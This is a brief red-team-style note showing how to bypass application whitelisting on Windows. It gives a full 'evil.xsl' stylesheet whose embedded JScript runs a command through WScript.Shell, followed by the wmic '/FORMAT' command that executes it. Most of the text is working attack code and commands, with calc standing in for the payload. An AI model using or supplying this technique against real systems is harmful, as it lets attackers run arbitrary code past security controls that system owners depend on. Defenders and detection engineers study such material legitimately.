Another application whitelist bypassing technique discovered by Casey @subTee, similar to squiblydoo:
Define the XSL file containing the jscript payload:
evil.xsl<?xml version='1.0'?><stylesheetxmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"xmlns:user="placeholder"version="1.0"><output method="text"/><ms:script implements-prefix="user" language="JScript"><![CDATA[var r = new ActiveXObject("WScript.Shell").Run("calc");]]> </ms:script></stylesheet>
Invoke any wmic command now and specify /format pointing to the evil.xsl:
attacker@victimwmic os get /FORMAT:"evil.xsl"
Calculator is spawned by svchost.exe:
​